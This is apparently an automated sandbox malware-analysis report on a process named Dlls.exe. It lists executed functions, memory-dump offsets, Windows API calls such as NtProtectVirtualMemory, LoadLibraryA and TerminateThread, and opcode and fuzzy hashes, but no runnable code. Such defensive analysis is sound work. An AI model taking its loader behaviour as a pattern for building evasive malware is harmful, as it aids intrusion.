Source File: 00000011.00000002.138640980805.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction ID: 8c3a2dcae88236e15fb2fe1386993c74cf0e62019859986665652b634c81cabf
Opcode Fuzzy Hash: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction Fuzzy Hash: CCC08C3A643548A1F98072E48A80A6931508F903C9F88C0299D170BA0EEF34E4077FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Dlls.exe PID: 7300 Parent PID: 4680 Dlls.exeCOMMON

Executed Functions

Function 02361BCE, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 566COMMON

Download Yara Rule

Strings

Gf8, xrefs: 0235C7D9
Z5, xrefs: 02363D6F

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: Gf8$Z5
API String ID: 3389902171-947967345
Opcode ID: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction ID: ea407feae2a4968fe715240b6c24f506c61a2eba76f17cb77ab800c45f24620d
Opcode Fuzzy Hash: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction Fuzzy Hash: 4C32B3315083858FDB35CF38C89C7EABBA6AF56310F4582AADC998F69AD3708545C712

Uniqueness

Uniqueness Score: -1.00%

Function 02357574, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 800COMMON

Download Yara Rule

Strings

QJQ, xrefs: 02351C83

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: QJQ
API String ID: 2616484454-1123671965
Opcode ID: 23a87022dab17b6a7da1b40d579749e676e298f6ed3110e98488bc9b326012ff
Instruction ID: c718b321d60e644b4d912aaa376a7ba177a15c10b4541088e0cec7fcbb988df0
Opcode Fuzzy Hash: 23a87022dab17b6a7da1b40d579749e676e298f6ed3110e98488bc9b326012ff
Instruction Fuzzy Hash: 8D7210B1A04359DFDB749F68C951BEA7BA6FF55340F11811ADC8E9B210D7309A81CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0236130A, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 790COMMON

Download Yara Rule

Strings

QJQ, xrefs: 02351C83

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QJQ
API String ID: 0-1123671965
Opcode ID: 3c8faa50bc7a6fbf58bdea1535cfeafc80df8a2332d9c73fd0d59aeacaf475f7
Instruction ID: 6cd9046019f2ebf20dfea9a87a759b748d9643d3c6ba1b9de24a66bde26fbe05
Opcode Fuzzy Hash: 3c8faa50bc7a6fbf58bdea1535cfeafc80df8a2332d9c73fd0d59aeacaf475f7
Instruction Fuzzy Hash: 317210B2A043999FDB749F28CD45BEABBB6FF55340F05811ADC899B614D3305A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0235087E, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 739COMMON

Download Yara Rule

Strings

QJQ, xrefs: 02351C83

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: QJQ
API String ID: 1029625771-1123671965
Opcode ID: b8476430e8e40aaf17f4d9c2bf36d9921c7c3f1080ee0bda1ffff81e29240989
Instruction ID: f3bf3fe22b8f499be70aad816c1c335f427fb1f3c236a3e4e1c1588190463085
Opcode Fuzzy Hash: b8476430e8e40aaf17f4d9c2bf36d9921c7c3f1080ee0bda1ffff81e29240989
Instruction Fuzzy Hash: F462FEB26043999FDB749F28CD55BEA7BB6FF55340F05812ADC8A9B210D7305A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0235557A, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0235C2D8: LoadLibraryA.KERNELBASE(D7EA1F99), ref: 0235D310

NtAllocateVirtualMemory.NTDLL ref: 02355BAE

Strings

_, xrefs: 02356024

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: _
API String ID: 2616484454-701932520
Opcode ID: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction ID: 5afcb4f6728a269f08174a0266437ea2ac2460e381a946ab1e057b53010e8e52
Opcode Fuzzy Hash: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction Fuzzy Hash: D1A10A31E086869FDB16EF3CDCCCEE6BBA6AF41724F45428CA8875B04AD3715516C782

Uniqueness

Uniqueness Score: -1.00%

Function 0236474A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

1bU, xrefs: 02364B4E

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 1bU
API String ID: 0-1111237263
Opcode ID: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction ID: 7268b1e3846eaf89bbd9cffe1e90f57d54a856686ec783055dc1b02638342b44
Opcode Fuzzy Hash: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction Fuzzy Hash: 68712571A08648CFDF35CE24C99D7FA37BAAF86310F51812ACC4A9F659C3358A45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0235ECDD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D7EA1F99), ref: 0235D310

Strings

Gf8, xrefs: 0235C7D9

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction ID: 390b439cf10131fe6d1479168a0b57068bf860fbf016cfff1bbd6c73188fbcbe
Opcode Fuzzy Hash: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction Fuzzy Hash: 2A3168716083A8CBDF30DF34CD44BEA3AB6AF90310F55552B9C4E9BA05C3305A42CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02364084, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 02364233

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction ID: fc4d2f39d71de18b3cf4575decd8c5875115a1c653e935b35bc1c9f34afaafbe
Opcode Fuzzy Hash: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction Fuzzy Hash: 9A1159714043949FDB34CF28CC946E677A8FF88310F44C19EDD856B206D7705902CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02354B8B, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 02354EB1

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction ID: f94db874389c7ba88cfe25a6640450e16c530966c9178ddd49df61170e55a7c9
Opcode Fuzzy Hash: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction Fuzzy Hash: 35110136988344EFC7986EA4D9456EABBA2FF99390F42480DDCCA53914D3340AD2CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0234267D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 02342687

Strings

Guc, xrefs: 02342694
E, xrefs: 023427D4

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: Guc$E
API String ID: 1129996299-111232842
Opcode ID: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction ID: 7d73b1a2620da6ba87009f5ceb3c0a13d96f3f3bd95230a13b17aa215cb77e21
Opcode Fuzzy Hash: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction Fuzzy Hash: DF71E832D096858FDB57EF3CD8CDDD6BBA6AE42624F1482CCE4834B40BE232551BC652

Uniqueness

Uniqueness Score: -1.00%

Function 0235C2D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D7EA1F99), ref: 0235D310

Strings

Gf8, xrefs: 0235C7D9

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction ID: 22365f66ad1271cbc32f96d4d77b21355e14e7b4391162ef38e42604e2f03b93
Opcode Fuzzy Hash: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction Fuzzy Hash: 7921A3706083A8CBDF349E24CD54EFD3A7AAF94310F40152BAC4E9B512C7309641CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02345FE9, Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-8FEA7603), ref: 02354692

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 62401bcc433a7fa942ee22debefb0fcb6746090667c9c76a8c06f7fa2a86af85
Instruction ID: 7b5cb07cf5650b10bafb3bdf01bfddf597ba38cc2b5dc4ab58abce4e483b416d
Opcode Fuzzy Hash: 62401bcc433a7fa942ee22debefb0fcb6746090667c9c76a8c06f7fa2a86af85
Instruction Fuzzy Hash: B141D0324082C59BCB228A3898066DABFB5AF03308F5945DEC9948BA52D736655BCB52

Uniqueness

Uniqueness Score: -1.00%

Function 0235503B, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02344924), ref: 023581A2

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab1d38cc2c255560439a55d2db53db10c69c2b8550f920f955e7d1f06f5794cc
Instruction ID: f00070e0f258ebaa5e16c5c4e72b9103eebb8773e16318a54a2eb21f4cfb2010
Opcode Fuzzy Hash: ab1d38cc2c255560439a55d2db53db10c69c2b8550f920f955e7d1f06f5794cc
Instruction Fuzzy Hash: 7311E536E04445DFDB22FF7CD8C8DD6BBAAAF42B14B514248E8825B50AD332851BCB91

Uniqueness

Uniqueness Score: -1.00%

Function 0235742D, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02344924), ref: 023581A2

Memory Dump Source

Source File: 00000012.00000002.138719279197.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction ID: 2f761d0d7ca7567e4f2375c1b956078729c626f8613eb81227b9896e06ef463f
Opcode Fuzzy Hash: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction Fuzzy Hash: 56C08C78A4253861E58033E48780E6821259F903C1FC9C021AD1E0BE0FCF34C686AF61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Dlls.exe PID: 7852 Parent PID: 2916 Dlls.exeCOMMON

Executed Functions

Function 0058727E, Relevance: 3.0, APIs: 2, Instructions: 37sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 005873C4
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00587529

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: c951f3cc3faba96444ec2cc02c88a8348aa12dcf994b50cfa3276dccc8b10dc1
Instruction ID: e34bd7b2ba402137e38e2d94c3a98e69f92637cc09a44ca0f9583e2d9e15a66a
Opcode Fuzzy Hash: c951f3cc3faba96444ec2cc02c88a8348aa12dcf994b50cfa3276dccc8b10dc1
Instruction Fuzzy Hash: BB017CB15487059FE701AF20C88DB59BBA0BF283A5F758584EC912B0B2D7B4C8848F62

Uniqueness

Uniqueness Score: -1.00%

Function 00586CD1, Relevance: 1.7, APIs: 1, Instructions: 158nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00587100

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d995ab92a5da7e9de651dd3b3e3a69fc7905a9f15216b6b0150b993debf2c0b8
Instruction ID: 67d2f4a3e8771e91a96e50d8f880ebbe0817a2ae10a621fef5caa90eefe06bdf
Opcode Fuzzy Hash: d995ab92a5da7e9de651dd3b3e3a69fc7905a9f15216b6b0150b993debf2c0b8
Instruction Fuzzy Hash: 8851A631E085429FDB56FF3CD8CDDA67BAAAE42628F1183CCA4835A04BE3358417C656

Uniqueness

Uniqueness Score: -1.00%

Function 00586E17, Relevance: 1.6, APIs: 1, Instructions: 150nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00587100

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 7ac720697720424479686cf5aeb2fccc4b671363650775b8cacc14fc286599fb
Instruction ID: 2c59a67bb7128f03c560f35656f0cf83fcce6b6f9af907d3791bfa3d7d5e7686
Opcode Fuzzy Hash: 7ac720697720424479686cf5aeb2fccc4b671363650775b8cacc14fc286599fb
Instruction Fuzzy Hash: B751BA31E185429FDB57FF3CD8CDDA67B6AAE42628F1183CCA4835A04BD3358417C656

Uniqueness

Uniqueness Score: -1.00%

Function 005873EB, Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00587529

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 75dcf0415af37b992872a6de20ba365d055ef86121b91a2528aa19edf5833110
Instruction ID: 64e702a9e3d8ac117753f07a92e3fe66fd052b6f86a10bf79a0b26b55cc52537
Opcode Fuzzy Hash: 75dcf0415af37b992872a6de20ba365d055ef86121b91a2528aa19edf5833110
Instruction Fuzzy Hash: EB419E36E099468FCB07FF7DD4CCD96BBA5AD02624F1183CCA4830A44FE275451BC692

Uniqueness

Uniqueness Score: -1.00%

Function 00586E0F, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00587100

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 9887de22d90c99ba8d0a0d0f20f572772224732fadefebd0dad53cdbd1f0d2d5
Instruction ID: dea66bb45262ed014a178b1f9b0df8e05a18d9dba7521c9e3742e43e38991e2d
Opcode Fuzzy Hash: 9887de22d90c99ba8d0a0d0f20f572772224732fadefebd0dad53cdbd1f0d2d5
Instruction Fuzzy Hash: 9E112BB06043018FDB549E64898AF6A3A56FF8A324F2583A5AD46EB1B3C735C881C721

Uniqueness

Uniqueness Score: -1.00%

Function 00586CCC, Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00587100

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 01cd7a1ce5acd20b88fd246117af9906187ee6f17c74cbc9e774d571e0c49112
Instruction ID: 851f5f81014fcaba2315ed2bc87dabfe8ee6acfbd8743156db5cf2795ea581d1
Opcode Fuzzy Hash: 01cd7a1ce5acd20b88fd246117af9906187ee6f17c74cbc9e774d571e0c49112
Instruction Fuzzy Hash: FD11C8B06043019FDB55AB24C98AF5A3A56FF89328F2142A5ED46BB1B3D734D841CB26

Uniqueness

Uniqueness Score: -1.00%

Function 005870C5, Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00587100

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a5f3c7b30993f97054e568af2e9ad686a5bdd25ad0f8f1925d5f6c185180c395
Instruction ID: 7a22e1904f48120d033661844ca15d2e8dba9342fa9c198a45f5f1c5a9eb8069
Opcode Fuzzy Hash: a5f3c7b30993f97054e568af2e9ad686a5bdd25ad0f8f1925d5f6c185180c395
Instruction Fuzzy Hash: 01F0E5F02553208FE3488F248E46F6A7924FF4922871547E8885AEA1B2C338C4018625

Uniqueness

Uniqueness Score: -1.00%

Function 0058629C, Relevance: 1.8, APIs: 1, Instructions: 256threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(E02E093C), ref: 00586566

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 034aae825dd653d1e0fdc55d5badb866cec49e927ded26923941fa7bc10c93fd
Instruction ID: b0c63f35d6fa1a2ddfae1a202b1be1e26326b6a7ec090020a1b74f28ba517043
Opcode Fuzzy Hash: 034aae825dd653d1e0fdc55d5badb866cec49e927ded26923941fa7bc10c93fd
Instruction Fuzzy Hash: FE3124702043029FDB246F94C5957A57BE1BF12329F5945AACC859B2A2E37488C5DB13

Uniqueness

Uniqueness Score: -1.00%

Function 005863F6, Relevance: 1.7, APIs: 1, Instructions: 179threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(E02E093C), ref: 00586566

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a9011f028d27ae4c68ac311907362daf7520b2a901e4dc670ecfb593bd1fd847
Instruction ID: d6df006bc7e2417c51f1e167aaae581b8ce05388ebc0df3d1ec1c5e12488f9e6
Opcode Fuzzy Hash: a9011f028d27ae4c68ac311907362daf7520b2a901e4dc670ecfb593bd1fd847
Instruction Fuzzy Hash: A7619131E085429FDB16FF68D8CDEA6BBA6AF02728F1583CCD4825A04BE375445AC752

Uniqueness

Uniqueness Score: -1.00%

Function 00587288, Relevance: 1.4, APIs: 1, Instructions: 110sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 005873C4
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00587529

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: fe55568688b5ad43b99f32cc364f54ffdac51293c3c06ebef316dd99eb92b9bd
Instruction ID: 3415052cfabccbcd4b74394d38b19bf2f22d7843081e3693f3a33dc8674f8e2c
Opcode Fuzzy Hash: fe55568688b5ad43b99f32cc364f54ffdac51293c3c06ebef316dd99eb92b9bd
Instruction Fuzzy Hash: A4419D35E089859FDB47FF3CD8CDDA1BBA6AD42A24F5583CCA4435A04FD272441BC692

Uniqueness

Uniqueness Score: -1.00%

Function 00587279, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 005873C4

Memory Dump Source

Source File: 00000013.00000002.142215631913.0000000000586000.00000040.00000001.sdmp, Offset: 00586000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d1a74de32385baf381703dc165caf52ceb92ceb276217d2bf10cc7c9cdf8df0e
Instruction ID: ba913717683a4c5a5121cd82f59a770cadfe1264939eef4ec615e28370d40574
Opcode Fuzzy Hash: d1a74de32385baf381703dc165caf52ceb92ceb276217d2bf10cc7c9cdf8df0e
Instruction Fuzzy Hash: 63E0EC70148705CFD740BB60858EB54BB61BF48311F7585C5ED491F1A38B61C840DB22

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Dlls.exe PID: 3384 Parent PID: 6216 Dlls.exeCOMMON

Executed Functions

Function 00581BCE, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 566COMMON

Download Yara Rule

Strings

Gf8, xrefs: 0057C7D9
Z5, xrefs: 00583D6F

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: Gf8$Z5
API String ID: 3389902171-947967345
Opcode ID: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction ID: c6c960dc5310d0beea88e0b8b0badbfc3d5daf5f9d75bba529208680e5522496
Opcode Fuzzy Hash: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction Fuzzy Hash: 5832D3715083858FDB35DF38C8987EA7FA2BF56310F5982AADC999F296D3308641C712

Uniqueness

Uniqueness Score: -1.00%

Function 0057557A, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0057C2D8: LoadLibraryA.KERNEL32(D7EA1F99,1AB02117,?,00008769,?,0057EB7C,?,0057CA52,1AB02117), ref: 0057D310

NtAllocateVirtualMemory.NTDLL ref: 00575BAE

Strings

_, xrefs: 00576024

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: _
API String ID: 2616484454-701932520
Opcode ID: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction ID: 279c0dbdecb7716e084ca0d5a795df40d0f66d2cf0b5fdb82c379f92cd0253c8
Opcode Fuzzy Hash: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction Fuzzy Hash: 99A1FB31E086869FDB16EF3CDCCDEE67BA6AF41714F45828CA8875B04AE3714516C782

Uniqueness

Uniqueness Score: -1.00%

Function 0058474A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

1bU, xrefs: 00584B4E

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 1bU
API String ID: 0-1111237263
Opcode ID: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction ID: 95ac01ba15637154fb95b604aa115dd932f09398d143d3e0366c5a0cf2c14552
Opcode Fuzzy Hash: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction Fuzzy Hash: 88713471A04A48CFDF35EE24C99C7EA3BB2BF95310F61461ACC4AAF214D3318A45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0057ECDD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(D7EA1F99,1AB02117,?,00008769,?,0057EB7C,?,0057CA52,1AB02117), ref: 0057D310

Strings

Gf8, xrefs: 0057C7D9

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction ID: 9da73af8162d02fbc084959978cfbeed09a152287dce85555fd64047fac297aa
Opcode Fuzzy Hash: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction Fuzzy Hash: 523146755082888BDF70DE35ED482EA3EB2BFE4310FA5C92E9C4D5B204D3715A42B792

Uniqueness

Uniqueness Score: -1.00%

Function 00566970, Relevance: 1.7, APIs: 1, Instructions: 210nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 00566972

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: bbdd4184b9c6f43cbd83bf701d028af3b6d0c7a13e1de9c3c7e4e2ac0d3b6566
Instruction ID: c2d68468108bc97e0435b9b1fb2777c07f99e991e087991684f2cfe9c1543061
Opcode Fuzzy Hash: bbdd4184b9c6f43cbd83bf701d028af3b6d0c7a13e1de9c3c7e4e2ac0d3b6566
Instruction Fuzzy Hash: BD81C732E185868FDB56FF3CE8CCDA67FA6AE42714F1482CCA4834B44BD236451BC652

Uniqueness

Uniqueness Score: -1.00%

Function 00586E0F, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00587100

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d597ffac7ff54cdbac2dc824901331cbe89459a7ad892a5d97136f7bd529ff01
Instruction ID: dea66bb45262ed014a178b1f9b0df8e05a18d9dba7521c9e3742e43e38991e2d
Opcode Fuzzy Hash: d597ffac7ff54cdbac2dc824901331cbe89459a7ad892a5d97136f7bd529ff01
Instruction Fuzzy Hash: 9E112BB06043018FDB549E64898AF6A3A56FF8A324F2583A5AD46EB1B3C735C881C721

Uniqueness

Uniqueness Score: -1.00%

Function 00584084, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 00584233

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction ID: 490b3ca9e6e85a12b57690301aafc7f88f6a0b65009f90a58abe5948c7f5c734
Opcode Fuzzy Hash: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction Fuzzy Hash: F51155714047949FDB34CF68CC986E6BBA4FF89320F44C1AEDC866B245D3705A02CB10

Uniqueness

Uniqueness Score: -1.00%

